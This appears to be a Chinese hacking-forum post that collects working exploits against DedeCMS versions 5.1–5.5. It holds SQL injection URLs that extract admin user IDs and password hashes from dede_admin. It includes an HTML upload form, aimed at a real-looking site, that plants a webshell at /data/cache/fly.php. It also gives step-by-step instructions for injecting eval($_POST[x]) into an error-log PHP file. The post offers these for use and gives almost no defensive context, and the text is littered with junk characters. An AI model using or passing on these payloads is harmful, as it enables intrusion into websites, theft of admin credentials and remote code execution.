; _% E' T# E3 [. q+ ^  v: y- i织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
+ z2 R6 T  y1 A6 x; rhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='* w4 [4 ?* ^* Z: K+ G

% \0 C, d0 v- L4 I: a  U5 c5 T/ l: G# f9 ^  I) i, b0 u
: T  I) s, w/ @% H! X$ Z9 Q9 g

0 `$ V4 s. |- S+ `( _' X, Z
/ `  a" g( v% ^) n0 `5 ?+ j1 l# H3 s: a
% B' k! @( R3 K7 I; w, F  ]
& Q9 s4 E) }' f# o. g
4 J% r& R/ R3 i1 }8 V* e1 y8 t% ]

) L! E- W% y( C. o, \织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
( ?; m* M( S% ^4 {5 M<html>) [0 i, C% j' E1 U4 a5 Q2 i( V
<head>
9 P) s/ u6 u. R2 B! H% F. g  d<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>' j7 l2 j5 N0 a: A; T/ h
</head>
3 @, h, d3 t3 s8 u$ f<body style="FONT-SIZE: 9pt">
/ E6 b: V7 D% ^: F" s) d5 k( f---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />- m# X. }3 @% N5 A# i5 b# O  O. g
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>2 b5 s5 ]7 P  e8 N( b' S
<input type='hidden' name='activepath' value='/data/cache/' />
9 {) q+ o$ @4 |! |<input type='hidden' name='cfg_basedir' value='../../' />
1 y6 y# A8 [/ Y. J3 b<input type='hidden' name='cfg_imgtype' value='php' />
" q  x: l0 q1 k3 k$ y* i<input type='hidden' name='cfg_not_allowall' value='txt' />) Y7 B+ ]2 N) s. |6 t9 a
<input type='hidden' name='cfg_softtype' value='php' />% ?3 p0 a# q1 x' j6 s( C
<input type='hidden' name='cfg_mediatype' value='php' />
$ Q5 m% ~+ m8 O/ _<input type='hidden' name='f' value='form1.enclosure' />2 E( E8 s& O5 |* \' c
<input type='hidden' name='job' value='upload' />
: H6 h5 Y; @/ u; R+ R; i7 ~<input type='hidden' name='newname' value='fly.php' />! ?3 @% s, W* I7 h1 `7 i
Select U Shell <input type='file' name='uploadfile' size='25' />
0 c) |6 {# T! V1 s4 c5 y0 L<input type='submit' name='sb1' value='确定' />' Q( }1 _, Z' @( b5 y0 ]
</form>
) s7 f: e$ l- R' C<br />It's just a exp for the bug of Dedecms V55...<br />
7 d: J, g9 i9 C# |Need register_globals = on...<br />
2 r1 [, M7 ^) {  nFun the game,get a webshell at /data/cache/fly.php...<br />
8 B  \3 {( K9 z8 S" r1 B</body>/ }+ [8 i. a# i
</html>& l  |! |  p) ?# G2 Y) R3 S

6 }9 H. ]# ]2 O7 r& v$ ^
6 }3 i$ f* |+ ]9 T3 j7 g+ P% ?3 U
5 H: E- N; A- e- }3 E, s- e

$ H0 G; E# v$ b" ~( m" y; }( j1 Z6 {7 P: ~2 o1 w+ y+ Z
/ `. j2 v2 p' g, J
; m; _; G2 w2 F& N; \5 ^8 {0 ]0 {

' r* E, F# d; y  D2 J* k5 c
' \0 g8 V' u4 t3 Z* ]织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞; k6 s. G7 x5 {& q0 h* M: N6 ^+ s, S
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。% o* L, J% b5 X; t$ l0 a6 G
1. 访问网址:
/ E: n( o) O: i3 E: N! w1 ^
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
3 g, U7 l: v1 m+ W  t可看见错误信息
3 Q3 ~5 j, ?5 w2 Q, G6 y
: L/ r3 I& e4 o, n" G6 B5 M/ O
: P+ Y6 o9 m# P* f7 f4 R2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。" u& h3 t0 F5 `6 j8 V$ w8 ?
int(3) Error: Illegal double '1024e1024' value found during parsing' i) C& @9 g0 r: f: h9 }' X
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
" U- Z4 t& m6 v8 j% E* @4 t5 M/ a) d4 c, o( [; T5 b) C
7 {$ j# q- E5 d: k2 F
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
! S( M1 u, n9 z" A( y& F: |6 F2 s: X5 n. S: |7 O$ z4 s" A) I$ e
4 L% ?2 Z# M$ k4 m
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>2 @5 b6 A. C* D7 Y# @
% i. x: A$ N  h

; s/ z; k  Y- u% g) O按确定后的看到第2步骤的信息表示文件木马上传成功.
7 X& q1 P/ c3 r& l
3 o9 E6 t9 L! S" b3 J* K8 ?; ]7 q! U8 e2 Z7 Q) x1 E  p4 d; `
1 u1 I; U3 m7 c
0 F# H% x' \: l. v1 ~+ A

: i, Y, `; [7 V
8 G4 }7 X. z- \, v& Y; K  G/ M9 b  e: |; K
5 G6 M9 J: ^( K9 Z6 I

# }4 v8 v" |  C; {1 _
/ p# \7 c' c, z7 [
. a. {) G9 S$ i' Y
$ s. [( q1 k- I/ _1 e. E6 w织梦(DedeCms)plus/infosearch.php 文件注入漏洞& K# }+ A6 g. T1 G
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表